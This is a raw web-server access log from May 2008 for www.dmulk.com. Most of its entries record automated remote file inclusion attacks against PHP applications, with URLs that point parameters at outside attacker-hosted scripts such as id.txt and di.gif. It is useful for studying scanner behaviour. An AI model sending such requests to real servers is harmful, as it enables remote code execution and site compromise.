66.35.4.200 - - [03/May/2008:10:19:25 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.34.16.180 - - [03/May/2008:10:19:26 -0700] "GET /logs/access_080304.log/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.16.180 - - [03/May/2008:10:19:27 -0700] "GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.16.180 - - [03/May/2008:10:19:28 -0700] "GET /logs/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.240.146 - - [03/May/2008:10:19:30 -0700] "GET /logs/access.log/index.php?x=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [03/May/2008:10:19:31 -0700] "GET /index.php?x=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [03/May/2008:10:19:31 -0700] "GET /logs/index.php?x=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [03/May/2008:10:19:34 -0700] "GET /index.php?pag=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:10:19:44 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:10:19:44 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.22.150.131 - - [03/May/2008:10:19:58 -0700] "GET /logs/index.php?pagina1=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.22.150.131 - - [03/May/2008:10:20:04 -0700] "GET /index.php?pagina1=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:10:20:11 -0700] "GET /logs/access_080130.log//modules/agendax/addevent.inc.php?agendax_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:10:20:12 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:10:20:12 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.74.37.170 - - [03/May/2008:10:20:14 -0700] "GET /apps/apps.php?app=http://rootshell.altervista.org/r0x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
195.74.37.170 - - [03/May/2008:10:20:15 -0700] "GET /logs/apps/apps.php?app=http://rootshell.altervista.org/r0x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:20:19 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:20:21 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.90.77.57 - - [03/May/2008:10:21:12 -0700] "GET /logs/access_080219.log/sources/lostpw.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.90.77.57 - - [03/May/2008:10:21:19 -0700] "GET /logs/access_080118.log/sources/lostpw.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.190.1.171 - - [03/May/2008:10:21:23 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [03/May/2008:10:21:23 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [03/May/2008:10:21:28 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [03/May/2008:10:21:28 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [03/May/2008:10:21:29 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [03/May/2008:10:21:35 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:22:06 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:22:07 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:22:07 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.22.150.131 - - [03/May/2008:10:22:44 -0700] "GET /logs/index.php3?act=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.22.150.131 - - [03/May/2008:10:22:48 -0700] "GET /index.php3?act=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:23:05 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:23:05 -0700] "GET //ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:23:05 -0700] "GET /logs//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:23:15 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:23:15 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:23:16 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:23:17 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:23:18 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:23:18 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:23:23 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.53.240.146 - - [03/May/2008:10:23:24 -0700] "GET /logs/access.log/index.php?pag=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:23:26 -0700] "GET //ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:23:26 -0700] "GET /logs//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.191.81.165 - - [03/May/2008:10:23:27 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.191.81.165 - - [03/May/2008:10:23:27 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.21 - - [03/May/2008:10:23:36 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
193.51.215.1 - - [03/May/2008:10:23:42 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:23:44 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.21 - - [03/May/2008:10:23:44 -0700] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/trackback/ HTTP/1.1" 200 10105 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.211.21 - - [03/May/2008:10:23:55 -0700] "GET /minamijewelry/?N=A HTTP/1.1" 200 2110 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
89.108.64.164 - - [03/May/2008:10:24:13 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.117 - - [03/May/2008:10:24:18 -0700] "GET /blog/ HTTP/1.1" 200 11607 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.221.79.151 - - [03/May/2008:10:24:27 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:24:27 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:24:27 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:10:24:28 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [03/May/2008:10:24:28 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:24:47 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.128.80.104 - - [03/May/2008:10:24:47 -0700] "GET /beacon/language/1/splash.lang.php?languagePath=http://www.freewebs.com/haddem/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
64.128.80.104 - - [03/May/2008:10:24:47 -0700] "GET /logs/beacon/language/1/splash.lang.php?languagePath=http://www.freewebs.com/haddem/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:24:48 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:24:56 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:24:57 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:24:57 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:25:11 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.3 - - [03/May/2008:10:25:16 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [03/May/2008:10:25:17 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:10:25:28 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:10:25:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:10:25:29 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:10:25:39 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:10:25:40 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:10:25:40 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:10:25:42 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:10:25:45 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:10:25:47 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:10:25:55 -0700] "GET /logs/access_080113.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:10:26:35 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.150.191.64 - - [03/May/2008:10:26:46 -0700] "GET /logs/access_080304.log/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [03/May/2008:10:26:46 -0700] "GET /logs/access_080304.log/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.150.191.64 - - [03/May/2008:10:26:46 -0700] "GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [03/May/2008:10:26:46 -0700] "GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.150.191.64 - - [03/May/2008:10:26:46 -0700] "GET /logs/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [03/May/2008:10:26:46 -0700] "GET /logs/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.86.181.227 - - [03/May/2008:10:26:51 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.86.181.227 - - [03/May/2008:10:26:52 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.86.181.227 - - [03/May/2008:10:26:53 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:10:27:16 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:10:27:16 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:10:27:17 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
210.86.181.227 - - [03/May/2008:10:27:23 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:10:27:25 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
203.130.242.135 - - [03/May/2008:10:27:25 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.130.242.135 - - [03/May/2008:10:27:25 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.130.242.135 - - [03/May/2008:10:27:31 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.130.242.135 - - [03/May/2008:10:27:32 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:10:27:40 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:10:27:40 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:27:42 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.easy-mart.co.kr/becommunity/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:27:42 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.easy-mart.co.kr/becommunity/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:10:27:53 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.geocities.com/inkamarsya/cheetos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:27:54 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.easy-mart.co.kr/becommunity/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:10:28:09 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:10:28:11 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:13 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:13 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:13 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:18 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:18 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:18 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:28:20 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.mariosoucy.com/voicefiles/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:28:20 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.mariosoucy.com/voicefiles/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:21 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:21 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:21 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:21 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:22 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:22 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:24 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:24 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:28:24 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
